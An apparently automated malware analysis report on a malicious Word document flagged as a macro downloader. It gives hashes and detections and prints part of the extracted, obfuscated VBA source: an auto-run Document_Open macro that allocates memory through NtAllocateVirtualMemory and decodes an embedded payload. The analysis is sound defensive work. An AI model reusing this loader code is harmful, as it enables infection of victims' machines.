Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d5bfe9cfa79dd9e…

MALICIOUS

Office (OLE)

307.5 KB Created: 2018-02-12 14:05:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: d7e39db06ddce5e6a9982b55672a513b SHA-1: 2e256c733b3824c4ea7743e2e141203f0a400274 SHA-256: 2d5bfe9cfa79dd9ea3b36d7c052b8440d0ea113331b4f7c8f3f41a1b0fa7da52
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the specific download URL is not directly present, the presence of macros and the downloader heuristic strongly suggest this attack pattern. No specific family could be identified.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9884 bytes
SHA-256: 2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
selfdenial
recommendation = 53 + 3
 Pmt 0, recommendation, 12303, 28962, 2
End Sub



Attribute VB_Name = "nissan"
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function colinus _
Lib "Ntdll  " Alias _
"NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long
#End If
Function deflect(after)
#If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then
Dim estoppel As LongPtr
countywide = 65 - 126 + 69
Dim comburent As LongPtr
Dim hampshire As LongPtr
dipsacus = VarPtr(estoppel)
bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide)
#End If
#If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then
Dim estoppel As Long
countywide = 58 - 23 - 31
Dim comburent As Long
Dim hampshire As Long
dipsacus = VarPtr(estoppel)
bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide)
#End If
comburent = 42 - 112 + 70
hampshire = 18 - 84 + 9905
antipsychotic = 39 - 101 + 4158
booze = 99 - 42 + 7
commelina = colinus(ByVal (91 - 126 + 34), _
comburent, _
ByVal (36 - 66 + 30), hampshire, _
ByVal antipsychotic, _
ByVal booze)
puncuality comburent, estoppel, 38 - 101 + 5946
Pmt 0, (48 + 17), 20068, 10392, 3
deflect = comburent
End Function


Attribute VB_Name = "mustang"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function colinus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr
#End If
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function rearguard _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long
#End If
Public Function superabat(cancan) As String
Dim bawdyhouse(63) As Long
Dim sundowner(6962) As Byte
Dim chalcedony As Long
Dim samara As Long
Dim embellishment As Long
Dim tightfitting(63) As Long
Dim fixedness(63) As Long
Dim osmanthus() As Byte
Dim wotan As Long
proctology = 11 - 58 + 262191
alongside = 70 - 72 + 257
meanings = 117 - 104 + 243
direction = 20 - 12 + 4088
qualification = 94 - 4 + 65446
cebidae = 103 - 49 + 10
evenhanded = 87 - 98 + 65291
severalty = 33 - 41 + 16711688
Dim hurl() As Byte
hurl = VBA.StrConv(cancan, 120 + 8)
miserere = 1 + 59
Pmt 0, miserere, 26798, 42787, 6
clamp = 7840 + 3
padre = vbKeyShift - 12
For attendance = (3 - 3) To clamp
If attendance Mod 2 = (4 - 4) Then
hurl(attendance) = hurl(attendance) - padre
Else
hurl(attendance) = hurl(attendance) - (padre - 1)
End If
Next attendance
crumenal = 27 + 27
Pmt 0, crumenal, 9696, 24175, 6
backswimmer = stridor
For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47)
fixedness(chalcedony) = insubordinate(chalcedony, direction, 47)
tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47)
Next chalcedony
rosales = 6 + 29
Pmt 0, rosales, 39805, 48993, 7
osmanthus = hurl
arbitrament = 21 + 51
Pmt 0, arbitrament, 9930, 52430, 4
christianity = 101 - 
... (truncated)